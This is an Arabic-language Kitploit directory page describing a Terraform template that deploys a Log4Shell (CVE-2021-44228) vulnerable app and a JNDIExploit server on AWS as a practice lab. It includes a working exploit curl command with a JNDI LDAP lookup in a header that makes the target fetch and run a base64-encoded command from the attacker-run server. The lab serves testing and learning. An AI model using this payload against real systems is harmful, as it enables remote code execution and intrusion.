Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4j-vulnerable-app-cve-2021-44228-terraform — Terraform لنشر تطبيق ضعيف وJDNIExploit للعمل مع CVE-2021-44228 | Kitploit
أدوات/GitHubGitHub/mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform
أمن البنية التحتية السحابيةتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubmkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform

log4j-vulnerable-app-cve-2021-44228-terraform

Terraform لنشر تطبيق ضعيف وJDNIExploit للعمل مع CVE-2021-44228

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
214منذ 4 سنواتلم تتم المراجعة بعد
مشاركة

log4j-vulnerable-app-cve-2021-44228-terraform

قالب Terraform لنشر تطبيق ضعيف وأداة JNDIExploit للعمل مع CVE-2021-44228

حول الحزمة

ينشئ هذا الـ Terraform مثيلين على شبكة VPC داخل سحابة AWS.

كل ما تحتاجه هو تصدير AWS_ACCESS_KEY_ID وAWS_SECRET_ACCESS_KEY

المثيل الأول هو JNDIExploit.

الثاني هو Vulnerable-App لاستغلال log4j.

يرجى استبدال مفتاح SSH العام الخاص بك في terraform قبل تنفيذ apply

root@kitploit:~
terraform init
terraform plan
terraform apply --auto-approve

الاستغلال

بعد النشر على AWS، يمكنك استغلال التطبيق بطلب curl، والتحقق من إنشاء ملف في /tmp داخل حاوية vulnerable-app.

root@kitploit:~
curl ${vulnerable-app-IP}:8090 -H 'X-Api-Version: ${jndi:ldap://${JNDIExploit-IP}:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

على خادم التطبيق vulnerable-app، نفّذ الأمر التالي للتحقق من تنفيذ الأوامر؛ يجب أن ترى ملف pwned.

root@kitploit:~
sudo docker exec -ti vulnerable-app ls /tmp
تنزيل الأداة